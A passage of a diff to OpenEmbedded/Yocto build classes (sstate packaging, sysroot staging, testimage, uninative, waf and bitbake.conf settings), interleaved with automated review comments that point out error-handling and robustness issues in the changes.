@@ -650,6 +667,8 @@ def sstate_package(ss, d):
# to sstate tasks but there aren't many of these so better just avoid them entirely.
for walkroot, dirs, files in os.walk(state[1]):
for file in files + dirs:
+ if fixtime:
+ fixtimestamp(walkroot, file)
srcpath = os.path.join(walkroot, file)
if not os.path.islink(srcpath):
continue
@@ -671,6 +690,11 @@ def sstate_package(ss, d):
bb.utils.mkdirhier(plain)
bb.utils.mkdirhier(pdir)
os.rename(plain, pdir)
+ if fixtime:
+ fixtimestamp(pdir, "")
+ for walkroot, dirs, files in os.walk(pdir):
+ for file in files + dirs:
+ fixtimestamp(walkroot, file)
d.setVar('SSTATE_BUILDDIR', sstatebuild)
d.setVar('SSTATE_INSTDIR', sstatebuild)
@@ -697,9 +721,16 @@ def sstate_package(ss, d):
os.utime(siginfo, None)
except PermissionError:
pass
+ except OSError as e:
+ # Handle read-only file systems gracefully
+ import errno
+ if e.errno != errno.EROFS:
+ raise e
return
+sstate_package[vardepsexclude] += "SSTATE_SIG_KEY"
+
def pstaging_fetch(sstatefetch, d):
import bb.fetch2
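Review bot: The new read-only-filesystem handler re-raises with `raise e`, where a bare `raise` is the usual form inside an `except` block, and it imports `errno` inside the handler rather than next to the function's other imports. The same five lines are added again in sstate_eventhandler (the `@@ -1133,6 +1174,11 @@` hunk), so the two sites could share one small helper that touches the siginfo file and tolerates PermissionError and EROFS. The enclosing function starts outside the hunk.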
@@ -783,7 +814,7 @@ sstate_task_postfunc[dirs] = "${WORKDIR}"
sstate_create_package () {
# Exit early if it already exists
if [ -e ${SSTATE_PKG} ]; then
- [ ! -w ${SSTATE_PKG} ] || touch ${SSTATE_PKG}
+ touch ${SSTATE_PKG} 2>/dev/null || true
return
fi
@@ -810,14 +841,18 @@ sstate_create_package () {
fi
chmod 0664 $TFILE
# Skip if it was already created by some other process
- if [ ! -e ${SSTATE_PKG} ]; then
+ if [ -h ${SSTATE_PKG} ] && [ ! -e ${SSTATE_PKG} ]; then
+ # There is a symbolic link, but it links to nothing.
+ # Forcefully replace it with the new file.
+ ln -f $TFILE ${SSTATE_PKG} || true
+ elif [ ! -e ${SSTATE_PKG} ]; then
# Move into place using ln to attempt an atomic op.
# Abort if it already exists
- ln $TFILE ${SSTATE_PKG} && rm $TFILE
+ ln $TFILE ${SSTATE_PKG} || true
else
- rm $TFILE
+ touch ${SSTATE_PKG} 2>/dev/null || true
fi
- [ ! -w ${SSTATE_PKG} ] || touch ${SSTATE_PKG}
+ rm $TFILE
}
python sstate_sign_package () {
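Review bot: Both `ln` calls now end in `|| true` and `rm $TFILE` runs unconditionally, so when the link fails for a reason other than the package already existing (cross-device link, permissions, full disk) the freshly built archive is deleted and the function still succeeds with nothing at `${SSTATE_PKG}`. A check before the final `rm` would make that visible, for example `[ -e ${SSTATE_PKG} ] || bbwarn "Could not link $TFILE to ${SSTATE_PKG}"`. The dangling-symlink branch also tests and then replaces in two steps, so another writer can create the file in between and `ln -f` will overwrite it; that is presumably acceptable for identical content but deserves a comment. sstate_create_package starts outside the hunk.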
@@ -846,12 +881,12 @@ python sstate_report_unihash() {
#
sstate_unpack_package () {
tar -xvzf ${SSTATE_PKG}
- # update .siginfo atime on local/NFS mirror
- [ -O ${SSTATE_PKG}.siginfo ] && [ -w ${SSTATE_PKG}.siginfo ] && [ -h ${SSTATE_PKG}.siginfo ] && touch -a ${SSTATE_PKG}.siginfo
- # Use "! -w ||" to return true for read only files
- [ ! -w ${SSTATE_PKG} ] || touch --no-dereference ${SSTATE_PKG}
- [ ! -w ${SSTATE_PKG}.sig ] || [ ! -e ${SSTATE_PKG}.sig ] || touch --no-dereference ${SSTATE_PKG}.sig
- [ ! -w ${SSTATE_PKG}.siginfo ] || [ ! -e ${SSTATE_PKG}.siginfo ] || touch --no-dereference ${SSTATE_PKG}.siginfo
+ # update .siginfo atime on local/NFS mirror if it is a symbolic link
+ [ ! -h ${SSTATE_PKG}.siginfo ] || [ ! -e ${SSTATE_PKG}.siginfo ] || touch -a ${SSTATE_PKG}.siginfo 2>/dev/null || true
+ # update each symbolic link instead of any referenced file
+ touch --no-dereference ${SSTATE_PKG} 2>/dev/null || true
+ [ ! -e ${SSTATE_PKG}.sig ] || touch --no-dereference ${SSTATE_PKG}.sig 2>/dev/null || true
+ [ ! -e ${SSTATE_PKG}.siginfo ] || touch --no-dereference ${SSTATE_PKG}.siginfo 2>/dev/null || true
}
BB_HASHCHECK_FUNCTION = "sstate_checkhashes"
@@ -926,7 +961,7 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True,
localdata2 = bb.data.createCopy(localdata)
srcuri = "file://" + sstatefile
- localdata.setVar('SRC_URI', srcuri)
+ localdata2.setVar('SRC_URI', srcuri)
bb.debug(2, "SState: Attempting to fetch %s" % srcuri)
try:
@@ -937,10 +972,11 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True,
found.add(tid)
if tid in missed:
missed.remove(tid)
- except:
+ except bb.fetch2.FetchError as e:
missed.add(tid)
- bb.debug(2, "SState: Unsuccessful fetch test for %s" % srcuri)
- pass
+ bb.debug(2, "SState: Unsuccessful fetch test for %s (%s)" % (srcuri, e))
+ except Exception as e:
+ bb.error("SState: cannot test %s: %s" % (srcuri, e))
if len(tasklist) >= min_tasks:
bb.event.fire(bb.event.ProcessProgress(msg, len(tasklist) - thread_worker.tasks.qsize()), d)
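Review bot: The catch-all branch reports only `str(e)`, which is empty for some exception types and drops the exception class, so the `bb.error` line may not say what went wrong; `bb.error("SState: cannot test %s: %r" % (srcuri, e))` keeps the type. In that branch `tid` is added to neither `found` nor `missed`, unlike the FetchError branch above it; if that is intended, a one-line comment saying so would help the next reader. The enclosing function starts and ends outside the hunk.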
@@ -1002,6 +1038,7 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True,
bb.parse.siggen.checkhashes(sq_data, missed, found, d)
return found
+setscene_depvalid[vardepsexclude] = "SSTATE_EXCLUDEDEPS_SYSROOT"
BB_SETSCENE_DEPVALID = "setscene_depvalid"
@@ -1027,6 +1064,10 @@ def setscene_depvalid(task, taskdependees, notneeded, d, log=None):
if taskdependees[task][1] == "do_populate_lic":
return True
+ # We only need to trigger deploy_source_date_epoch through direct dependencies
+ if taskdependees[task][1] == "do_deploy_source_date_epoch":
+ return True
+
# stash_locale and gcc_stash_builddir are never needed as a dependency for built objects
if taskdependees[task][1] == "do_stash_locale" or taskdependees[task][1] == "do_gcc_stash_builddir":
return True
@@ -1133,6 +1174,11 @@ python sstate_eventhandler() {
os.utime(siginfo, None)
except PermissionError:
pass
+ except OSError as e:
+ # Handle read-only file systems gracefully
+ import errno
+ if e.errno != errno.EROFS:
+ raise e
}
@@ -1171,11 +1217,21 @@ python sstate_eventhandler2() {
i = d.expand("${SSTATE_MANIFESTS}/index-" + a)
if not os.path.exists(i):
continue
+ manseen = set()
+ ignore = []
with open(i, "r") as f:
lines = f.readlines()
- for l in lines:
+ for l in reversed(lines):
try:
(stamp, manifest, workdir) = l.split()
+ # The index may have multiple entries for the same manifest as the code above only appends
+ # new entries and there may be an entry with matching manifest but differing version in stamp/workdir.
+ # The last entry in the list is the valid one, any earlier entries with matching manifests
+ # should be ignored.
+ if manifest in manseen:
+ ignore.append(l)
+ continue
+ manseen.add(manifest)
if stamp not in stamps and stamp not in preservestamps and stamp in machineindex:
toremove.append(l)
if stamp not in seen:
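Review bot: `ignore` holds line text and is consulted with `if l in ignore` in the write loop of the later `@@ -1206,6 +1262,8 @@` hunk, so the filter works by content rather than by position. If the index ever contained two byte-identical lines, the older copy would land in `ignore` and the write loop would then drop the newest copy as well; sstate_install only appends lines that are not already present, so this should be rare, but tracking line indices instead of text would rule it out. Independently, `ignore = set()` with `ignore.add(l)` avoids a linear scan per written line. The enclosing function starts and ends outside the hunk.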
@@ -1206,6 +1262,8 @@ python sstate_eventhandler2() {
with open(i, "w") as f:
for l in lines:
+ if l in ignore:
+ continue
f.write(l)
machineindex |= set(stamps)
with open(mi, "w") as f:
diff --git a/meta/classes/staging.bbclass b/meta/classes/staging.bbclass
index 5b04f88b2d..21523c8f75 100644
--- a/meta/classes/staging.bbclass
+++ b/meta/classes/staging.bbclass
@@ -27,11 +27,15 @@ SYSROOT_DIRS_BLACKLIST = " \
${mandir} \
${docdir} \
${infodir} \
+ ${datadir}/X11/locale \
${datadir}/applications \
+ ${datadir}/bash-completion \
${datadir}/fonts \
${datadir}/gtk-doc/html \
+ ${datadir}/installed-tests \
${datadir}/locale \
${datadir}/pixmaps \
+ ${datadir}/terminfo \
${libdir}/${BPN}/ptest \
"
@@ -263,6 +267,10 @@ python extend_recipe_sysroot() {
pn = d.getVar("PN")
stagingdir = d.getVar("STAGING_DIR")
sharedmanifests = d.getVar("COMPONENTS_DIR") + "/manifests"
+ # only needed by multilib cross-canadian since it redefines RECIPE_SYSROOT
+ manifestprefix = d.getVar("RECIPE_SYSROOT_MANIFEST_SUBDIR")
+ if manifestprefix:
+ sharedmanifests = sharedmanifests + "/" + manifestprefix
recipesysroot = d.getVar("RECIPE_SYSROOT")
recipesysrootnative = d.getVar("RECIPE_SYSROOT_NATIVE")
@@ -404,7 +412,7 @@ python extend_recipe_sysroot() {
if os.path.islink(f) and not os.path.exists(f):
bb.note("%s no longer exists, removing from sysroot" % f)
lnk = os.readlink(f.replace(".complete", ""))
- sstate_clean_manifest(depdir + "/" + lnk, d, workdir)
+ sstate_clean_manifest(depdir + "/" + lnk, d, canrace=True, prefix=workdir)
os.unlink(f)
os.unlink(f.replace(".complete", ""))
@@ -449,7 +457,7 @@ python extend_recipe_sysroot() {
fl = depdir + "/" + l
bb.note("Task %s no longer depends on %s, removing from sysroot" % (mytaskname, l))
lnk = os.readlink(fl)
- sstate_clean_manifest(depdir + "/" + lnk, d, workdir)
+ sstate_clean_manifest(depdir + "/" + lnk, d, canrace=True, prefix=workdir)
os.unlink(fl)
os.unlink(fl + ".complete")
@@ -470,7 +478,7 @@ python extend_recipe_sysroot() {
continue
else:
bb.note("%s exists in sysroot, but is stale (%s vs. %s), removing." % (c, lnk, c + "." + taskhash))
- sstate_clean_manifest(depdir + "/" + lnk, d, workdir)
+ sstate_clean_manifest(depdir + "/" + lnk, d, canrace=True, prefix=workdir)
os.unlink(depdir + "/" + c)
if os.path.lexists(depdir + "/" + c + ".complete"):
os.unlink(depdir + "/" + c + ".complete")
diff --git a/meta/classes/systemd.bbclass b/meta/classes/systemd.bbclass
index 9e8a82c9f1..a4bff732b9 100644
--- a/meta/classes/systemd.bbclass
+++ b/meta/classes/systemd.bbclass
@@ -174,7 +174,8 @@ python systemd_populate_packages() {
if path_found != '':
systemd_add_files_and_parse(pkg_systemd, path_found, service, keys)
else:
- bb.fatal("SYSTEMD_SERVICE_%s value %s does not exist" % (pkg_systemd, service))
+ bb.fatal("Didn't find service unit '{0}', specified in SYSTEMD_SERVICE_{1}. {2}".format(
+ service, pkg_systemd, "Also looked for service unit '{0}'.".format(base) if base is not None else ""))
def systemd_create_presets(pkg, action):
presetf = oe.path.join(d.getVar("PKGD"), d.getVar("systemd_unitdir"), "system-preset/98-%s.preset" % pkg)
diff --git a/meta/classes/testimage.bbclass b/meta/classes/testimage.bbclass
index c709384b91..7c8b2b30a1 100644
--- a/meta/classes/testimage.bbclass
+++ b/meta/classes/testimage.bbclass
@@ -99,30 +99,9 @@ TESTIMAGE_DUMP_DIR ?= "${LOG_DIR}/runtime-hostdump/"
TESTIMAGE_UPDATE_VARS ?= "DL_DIR WORKDIR DEPLOY_DIR"
testimage_dump_target () {
- top -bn1
- ps
- free
- df
- # The next command will export the default gateway IP
- export DEFAULT_GATEWAY=$(ip route | awk '/default/ { print $3}')
- ping -c3 $DEFAULT_GATEWAY
- dmesg
- netstat -an
- ip address
- # Next command will dump logs from /var/log/
- find /var/log/ -type f 2>/dev/null -exec echo "====================" \; -exec echo {} \; -exec echo "====================" \; -exec cat {} \; -exec echo "" \;
}
testimage_dump_host () {
- top -bn1
- iostat -x -z -N -d -p ALL 20 2
- ps -ef
- free
- df
- memstat
- dmesg
- ip -s link
- netstat -an
}
python do_testimage() {
@@ -193,6 +172,7 @@ def testimage_main(d):
import json
import signal
import logging
+ import shutil
from bb.utils import export_proxies
from oeqa.core.utils.misc import updateTestData
@@ -228,9 +208,10 @@ def testimage_main(d):
tdname = "%s.testdata.json" % image_name
try:
- td = json.load(open(tdname, "r"))
- except (FileNotFoundError) as err:
- bb.fatal('File %s Not Found. Have you built the image with INHERIT+="testimage" in the conf/local.conf?' % tdname)
+ with open(tdname, "r") as f:
+ td = json.load(f)
+ except FileNotFoundError as err:
+ bb.fatal('File %s not found (%s).\nHave you built the image with INHERIT += "testimage" in the conf/local.conf?' % (tdname, err))
# Some variables need to be updates (mostly paths) with the
# ones of the current environment because some tests require them.
@@ -397,10 +378,17 @@ def testimage_main(d):
get_testimage_result_id(configuration),
dump_streams=d.getVar('TESTREPORT_FULLLOGS'))
results.logSummary(pn)
+
+ # Copy additional logs to tmp/log/oeqa so it's easier to find them
+ targetdir = os.path.join(get_testimage_json_result_dir(d), d.getVar("PN"))
+ os.makedirs(targetdir, exist_ok=True)
+ os.symlink(bootlog, os.path.join(targetdir, os.path.basename(bootlog)))
+ os.symlink(d.getVar("BB_LOGFILE"), os.path.join(targetdir, os.path.basename(d.getVar("BB_LOGFILE") + "." + d.getVar('DATETIME'))))
+
if not results or not complete:
- bb.fatal('%s - FAILED - tests were interrupted during execution' % pn, forcelog=True)
+ bb.fatal('%s - FAILED - tests were interrupted during execution, check the logs in %s' % (pn, d.getVar("LOG_DIR")), forcelog=True)
if not results.wasSuccessful():
- bb.fatal('%s - FAILED - check the task log and the ssh log' % pn, forcelog=True)
+ bb.fatal('%s - FAILED - also check the logs in %s' % (pn, d.getVar("LOG_DIR")), forcelog=True)
def get_runtime_paths(d):
"""
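Review bot: The two `os.symlink` calls run before the `results`/`complete` checks, so an OSError from them (for instance FileExistsError if a link of that name is already in `targetdir`, which `exist_ok=True` keeps between runs) aborts the task before the test outcome is reported. Since the links are only a convenience, put both calls in a `try:` and handle `except OSError as e: bb.warn("Could not link logs into %s: %s" % (targetdir, e))`. Whether `bootlog` has a unique name per run is not visible in this hunk. testimage_main starts outside the hunk.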
diff --git a/meta/classes/toolchain-scripts.bbclass b/meta/classes/toolchain-scripts.bbclass
index db1d3215ef..21762b803b 100644
--- a/meta/classes/toolchain-scripts.bbclass
+++ b/meta/classes/toolchain-scripts.bbclass
@@ -29,7 +29,7 @@ toolchain_create_sdk_env_script () {
echo '# http://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html#AEN80' >> $script
echo '# http://xahlee.info/UnixResource_dir/_/ldpath.html' >> $script
echo '# Only disable this check if you are absolutely know what you are doing!' >> $script
- echo 'if [ ! -z "$LD_LIBRARY_PATH" ]; then' >> $script
+ echo 'if [ ! -z "${LD_LIBRARY_PATH:-}" ]; then' >> $script
echo " echo \"Your environment is misconfigured, you probably need to 'unset LD_LIBRARY_PATH'\"" >> $script
echo " echo \"but please check why this was set in the first place and that it's safe to unset.\"" >> $script
echo ' echo "The SDK will not operate correctly in most cases when LD_LIBRARY_PATH is set."' >> $script
@@ -44,7 +44,7 @@ toolchain_create_sdk_env_script () {
for i in ${CANADIANEXTRAOS}; do
EXTRAPATH="$EXTRAPATH:$sdkpathnative$bindir/${TARGET_ARCH}${TARGET_VENDOR}-$i"
done
- echo "export PATH=$sdkpathnative$bindir:$sdkpathnative$sbindir:$sdkpathnative$base_bindir:$sdkpathnative$base_sbindir:$sdkpathnative$bindir/../${HOST_SYS}/bin:$sdkpathnative$bindir/${TARGET_SYS}"$EXTRAPATH':$PATH' >> $script
+ echo "export PATH=$sdkpathnative$bindir:$sdkpathnative$sbindir:$sdkpathnative$base_bindir:$sdkpathnative$base_sbindir:$sdkpathnative$bindir/../${HOST_SYS}/bin:$sdkpathnative$bindir/${TARGET_SYS}"$EXTRAPATH':"$PATH"' >> $script
echo 'export PKG_CONFIG_SYSROOT_DIR=$SDKTARGETSYSROOT' >> $script
echo 'export PKG_CONFIG_PATH=$SDKTARGETSYSROOT'"$libdir"'/pkgconfig:$SDKTARGETSYSROOT'"$prefix"'/share/pkgconfig' >> $script
echo 'export CONFIG_SITE=${SDKPATH}/site-config-'"${multimach_target_sys}" >> $script
diff --git a/meta/classes/uboot-extlinux-config.bbclass b/meta/classes/uboot-extlinux-config.bbclass
index f4bf94be04..be285daa01 100644
--- a/meta/classes/uboot-extlinux-config.bbclass
+++ b/meta/classes/uboot-extlinux-config.bbclass
@@ -153,5 +153,6 @@ python do_create_extlinux_config() {
}
UBOOT_EXTLINUX_VARS = "CONSOLE MENU_DESCRIPTION ROOT KERNEL_IMAGE FDTDIR FDT KERNEL_ARGS INITRD"
do_create_extlinux_config[vardeps] += "${@' '.join(['UBOOT_EXTLINUX_%s_%s' % (v, l) for v in d.getVar('UBOOT_EXTLINUX_VARS').split() for l in d.getVar('UBOOT_EXTLINUX_LABELS').split()])}"
+do_create_extlinux_config[vardepsexclude] += "OVERRIDES"
addtask create_extlinux_config before do_install do_deploy after do_compile
diff --git a/meta/classes/uninative.bbclass b/meta/classes/uninative.bbclass
index 1e19917a97..4d4f53ad4d 100644
--- a/meta/classes/uninative.bbclass
+++ b/meta/classes/uninative.bbclass
@@ -2,7 +2,7 @@ UNINATIVE_LOADER ?= "${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux/lib/
UNINATIVE_STAGING_DIR ?= "${STAGING_DIR}"
UNINATIVE_URL ?= "unset"
-UNINATIVE_TARBALL ?= "${BUILD_ARCH}-nativesdk-libc.tar.xz"
+UNINATIVE_TARBALL ?= "${BUILD_ARCH}-nativesdk-libc-${UNINATIVE_VERSION}.tar.xz"
# Example checksums
#UNINATIVE_CHECKSUM[aarch64] = "dead"
#UNINATIVE_CHECKSUM[i686] = "dead"
@@ -34,6 +34,8 @@ python uninative_event_fetchloader() {
with open(loaderchksum, "r") as f:
readchksum = f.read().strip()
if readchksum == chksum:
+ if "uninative" not in d.getVar("SSTATEPOSTUNPACKFUNCS"):
+ enable_uninative(d)
return
import subprocess
@@ -100,7 +102,7 @@ ${UNINATIVE_STAGING_DIR}-uninative/relocate_sdk.py \
${UNINATIVE_LOADER} \
${UNINATIVE_LOADER} \
${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux/${bindir_native}/patchelf-uninative \
- ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux${base_libdir_native}/libc*.so" % chksum)
+ ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux${base_libdir_native}/libc*.so*" % chksum)
subprocess.check_output(cmd, shell=True)
with open(loaderchksum, "w") as f:
@@ -167,5 +169,7 @@ python uninative_changeinterp () {
if not elf.isDynamic():
continue
+ os.chmod(f, s[stat.ST_MODE] | stat.S_IWUSR)
subprocess.check_output(("patchelf-uninative", "--set-interpreter", d.getVar("UNINATIVE_LOADER"), f), stderr=subprocess.STDOUT)
+ os.chmod(f, s[stat.ST_MODE])
}
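Review bot: The original mode is restored only when patchelf succeeds; `subprocess.check_output` raises CalledProcessError on a non-zero exit, and the file then stays user-writable. Wrapping the call as `try:` … `finally: os.chmod(f, s[stat.ST_MODE])` restores the mode on both paths. `s` and the `stat` import come from outside the hunk.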
diff --git a/meta/classes/useradd-staticids.bbclass b/meta/classes/useradd-staticids.bbclass
index 3a1b5f1320..908b24969f 100644
--- a/meta/classes/useradd-staticids.bbclass
+++ b/meta/classes/useradd-staticids.bbclass
@@ -41,7 +41,7 @@ def update_useradd_static_config(d):
def handle_missing_id(id, type, pkg, files, var, value):
# For backwards compatibility we accept "1" in addition to "error"
error_dynamic = d.getVar('USERADD_ERROR_DYNAMIC')
- msg = "%s - %s: %sname %s does not have a static ID defined." % (d.getVar('PN'), pkg, type, id)
+ msg = 'Recipe %s, package %s: %sname "%s" does not have a static ID defined.' % (d.getVar('PN'), pkg, type, id)
if files:
msg += " Add %s to one of these files: %s" % (id, files)
else:
diff --git a/meta/classes/useradd.bbclass b/meta/classes/useradd.bbclass
index e5f3ba24f9..0f0ed3446d 100644
--- a/meta/classes/useradd.bbclass
+++ b/meta/classes/useradd.bbclass
@@ -230,6 +230,10 @@ fakeroot python populate_packages_prepend () {
preinst += 'perform_useradd () {\n%s}\n' % d.getVar('perform_useradd')
preinst += 'perform_groupmems () {\n%s}\n' % d.getVar('perform_groupmems')
preinst += d.getVar('useradd_preinst')
+ # Expand out the *_PARAM variables to the package specific versions
+ for rep in ["GROUPADD_PARAM", "USERADD_PARAM", "GROUPMEMS_PARAM"]:
+ val = d.getVar(rep + "_" + pkg) or ""
+ preinst = preinst.replace("${" + rep + "}", val)
d.setVar('pkg_preinst_%s' % pkg, preinst)
# RDEPENDS setup
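Review bot: The per-package `*_PARAM` values are pasted into the preinst text with `str.replace` and no shell quoting, so characters such as `"`, `$` or backticks in a value are interpreted by the shell when the preinst script runs at package install. How the `${…}` placeholders are quoted inside `useradd_preinst` is not visible here. The values are recipe metadata, so this is a robustness concern rather than an untrusted-input one, but a comment above the loop would help: `# values are inserted verbatim; recipes must escape shell metacharacters themselves`. The enclosing function starts and ends outside the hunk.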
diff --git a/meta/classes/utils.bbclass b/meta/classes/utils.bbclass
index cd3d05709e..99f68f7505 100644
--- a/meta/classes/utils.bbclass
+++ b/meta/classes/utils.bbclass
@@ -233,7 +233,7 @@ create_cmdline_wrapper () {
#!/bin/bash
realpath=\`readlink -fn \$0\`
realdir=\`dirname \$realpath\`
-exec -a \`dirname \$realpath\`/$cmdname \`dirname \$realpath\`/$cmdname.real $cmdoptions "\$@"
+exec -a \$realdir/$cmdname \$realdir/$cmdname.real $cmdoptions "\$@"
END
chmod +x $cmd
}
diff --git a/meta/classes/waf.bbclass b/meta/classes/waf.bbclass
index 900244004e..8fa5063645 100644
--- a/meta/classes/waf.bbclass
+++ b/meta/classes/waf.bbclass
@@ -1,10 +1,19 @@
# avoids build breaks when using no-static-libs.inc
DISABLE_STATIC = ""
+# What Python interpretter to use. Defaults to Python 3 but can be
+# overridden if required.
+WAF_PYTHON ?= "python3"
+
B = "${WORKDIR}/build"
EXTRA_OECONF_append = " ${PACKAGECONFIG_CONFARGS}"
+EXTRA_OEWAF_BUILD ??= ""
+# In most cases, you want to pass the same arguments to `waf build` and `waf
+# install`, but you can override it if necessary
+EXTRA_OEWAF_INSTALL ??= "${EXTRA_OEWAF_BUILD}"
+
def waflock_hash(d):
# Calculates the hash used for the waf lock file. This should include
# all of the user controllable inputs passed to waf configure. Note
@@ -35,9 +44,10 @@ python waf_preconfigure() {
import subprocess
from distutils.version import StrictVersion
subsrcdir = d.getVar('S')
+ python = d.getVar('WAF_PYTHON')
wafbin = os.path.join(subsrcdir, 'waf')
try:
- result = subprocess.check_output([wafbin, '--version'], cwd=subsrcdir, stderr=subprocess.STDOUT)
+ result = subprocess.check_output([python, wafbin, '--version'], cwd=subsrcdir, stderr=subprocess.STDOUT)
version = result.decode('utf-8').split()[1]
if StrictVersion(version) >= StrictVersion("1.8.7"):
d.setVar("WAF_EXTRA_CONF", "--bindir=${bindir} --libdir=${libdir}")
@@ -50,16 +60,16 @@ python waf_preconfigure() {
do_configure[prefuncs] += "waf_preconfigure"
waf_do_configure() {
- (cd ${S} && ./waf configure -o ${B} --prefix=${prefix} ${WAF_EXTRA_CONF} ${EXTRA_OECONF})
+ (cd ${S} && ${WAF_PYTHON} ./waf configure -o ${B} --prefix=${prefix} ${WAF_EXTRA_CONF} ${EXTRA_OECONF})
}
do_compile[progress] = "outof:^\[\s*(\d+)/\s*(\d+)\]\s+"
waf_do_compile() {
- (cd ${S} && ./waf build ${@oe.utils.parallel_make_argument(d, '-j%d', limit=64)})
+ (cd ${S} && ${WAF_PYTHON} ./waf build ${@oe.utils.parallel_make_argument(d, '-j%d', limit=64)} ${EXTRA_OEWAF_BUILD})
}
waf_do_install() {
- (cd ${S} && ./waf install --destdir=${D})
+ (cd ${S} && ${WAF_PYTHON} ./waf install --destdir=${D} ${EXTRA_OEWAF_INSTALL})
}
EXPORT_FUNCTIONS do_configure do_compile do_install
diff --git a/meta/conf/abi_version.conf b/meta/conf/abi_version.conf
index 2bdc55695b..35faef9a36 100644
--- a/meta/conf/abi_version.conf
+++ b/meta/conf/abi_version.conf
@@ -4,7 +4,7 @@
# that breaks the format and have been previously discussed on the mailing list
# with general agreement from the core team.
#
-OELAYOUT_ABI = "12"
+OELAYOUT_ABI = "14"
#
# HASHEQUIV_HASH_VERSION is injected into the output hash calculation used by
@@ -12,4 +12,4 @@ OELAYOUT_ABI = "12"
# a reset of the equivalence, for example when reproducibility issues break the
# existing match data. Distros can also append to this value for the same effect.
#
-HASHEQUIV_HASH_VERSION = "1"
+HASHEQUIV_HASH_VERSION = "5"
diff --git a/meta/conf/bitbake.conf b/meta/conf/bitbake.conf
index bdade79abe..457b7790c2 100644
--- a/meta/conf/bitbake.conf
+++ b/meta/conf/bitbake.conf
@@ -208,6 +208,7 @@ PF = "${PN}-${EXTENDPE}${PV}-${PR}"
EXTENDPE = "${@['','${PE}_'][int(d.getVar('PE') or 0) > 0]}"
P = "${PN}-${PV}"
+PRSERV_PV_AUTOINC = "AUTOINC"
PRAUTO = ""
EXTENDPRAUTO = "${@['.${PRAUTO}', ''][not d.getVar('PRAUTO')]}"
PRAUTOINX = "${PF}"
@@ -420,8 +421,10 @@ PKGDATA_DIR = "${TMPDIR}/pkgdata/${MACHINE}"
SDK_NAME_PREFIX ?= "oecore"
SDK_NAME = "${SDK_NAME_PREFIX}-${SDK_ARCH}-${TUNE_PKGARCH}"
-SDKPATH = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}"
+SDKPATH = "/usr/local/oe-sdk-hardcoded-buildpath"
SDKPATHNATIVE = "${SDKPATH}/sysroots/${SDK_SYS}"
+# The path to default to installing the SDK to
+SDKPATHINSTALL = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}"
##################################################################
# Kernel info.
@@ -479,7 +482,7 @@ export PATH
# Build utility info.
##################################################################
-# Directory where host tools are copied
+# Directory with symlinks to host tools used by build
HOSTTOOLS_DIR = "${TMPDIR}/hosttools"
# Tools needed to run builds with OE-Core
@@ -499,7 +502,7 @@ HOSTTOOLS += " \
HOSTTOOLS += "${@'ip ping ps scp ssh stty' if (bb.utils.contains_any('IMAGE_CLASSES', 'testimage testsdk', True, False, d) or any(x in (d.getVar("BBINCLUDED") or "") for x in ["testimage.bbclass", "testsdk.bbclass"])) else ''}"
# Link to these if present
-HOSTTOOLS_NONFATAL += "aws gcc-ar gpg ld.bfd ld.gold nc pigz sftp socat ssh sudo"
+HOSTTOOLS_NONFATAL += "aws gcc-ar gpg gpg-agent ld.bfd ld.gold nc pigz sftp socat ssh sudo"
# Temporary add few more detected in bitbake world
HOSTTOOLS_NONFATAL += "join nl size yes zcat"
@@ -638,7 +641,7 @@ APACHE_MIRROR = "https://archive.apache.org/dist"
DEBIAN_MIRROR = "http://ftp.debian.org/debian/pool"
GENTOO_MIRROR = "http://distfiles.gentoo.org/distfiles"
GNOME_GIT = "git://gitlab.gnome.org/GNOME"
-GNOME_MIRROR = "https://ftp.gnome.org/pub/GNOME/sources"
+GNOME_MIRROR = "https://download.gnome.org/sources/"
GNU_MIRROR = "https://ftp.gnu.org/gnu"
GNUPG_MIRROR = "https://www.gnupg.org/ftp/gcrypt"
GPE_MIRROR = "http://gpe.linuxtogo.org/download/source"
@@ -686,13 +689,18 @@ SRC_URI = ""
PSEUDO_LOCALSTATEDIR ?= "${WORKDIR}/pseudo/"
PSEUDO_PASSWD ?= "${STAGING_DIR_TARGET}:${PSEUDO_SYSROOT}"
PSEUDO_SYSROOT = "${COMPONENTS_DIR}/${BUILD_ARCH}/pseudo-native"
+PSEUDO_IGNORE_PATHS = "/usr/,/etc/,/lib,/dev/,/run/,${T},${WORKDIR}/recipe-sysroot,${SSTATE_DIR},${STAMPS_DIR}"
+PSEUDO_IGNORE_PATHS .= ",${TMPDIR}/sstate-control,${TMPDIR}/buildstats,${TMPDIR}/sysroots-components,${TMPDIR}/pkgdata"
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/deploy-,${WORKDIR}/sstate-build-package_,${WORKDIR}/sstate-install-package_,${WORKDIR}/pkgdata-sysroot"
+PSEUDO_IGNORE_PATHS .= ",${DEPLOY_DIR},${BUILDHISTORY_DIR},${TOPDIR}/cache,${COREBASE}/scripts,${CCACHE_DIR}"
+
export PSEUDO_DISABLED = "1"
#export PSEUDO_PREFIX = "${STAGING_DIR_NATIVE}${prefix_native}"
#export PSEUDO_BINDIR = "${STAGING_DIR_NATIVE}${bindir_native}"
#export PSEUDO_LIBDIR = "${STAGING_DIR_NATIVE}$PSEUDOBINDIR/../lib/pseudo/lib
-FAKEROOTBASEENV = "PSEUDO_BINDIR=${PSEUDO_SYSROOT}${bindir_native} PSEUDO_LIBDIR=${PSEUDO_SYSROOT}${prefix_native}/lib/pseudo/lib PSEUDO_PREFIX=${PSEUDO_SYSROOT}${prefix_native} PSEUDO_DISABLED=1"
+FAKEROOTBASEENV = "PSEUDO_BINDIR=${PSEUDO_SYSROOT}${bindir_native} PSEUDO_LIBDIR=${PSEUDO_SYSROOT}${prefix_native}/lib/pseudo/lib PSEUDO_PREFIX=${PSEUDO_SYSROOT}${prefix_native} PSEUDO_IGNORE_PATHS=${@oe.path.canonicalize(d.getVar('PSEUDO_IGNORE_PATHS'))} PSEUDO_DISABLED=1 PYTHONDONTWRITEBYTECODE=1"
FAKEROOTCMD = "${PSEUDO_SYSROOT}${bindir_native}/pseudo"
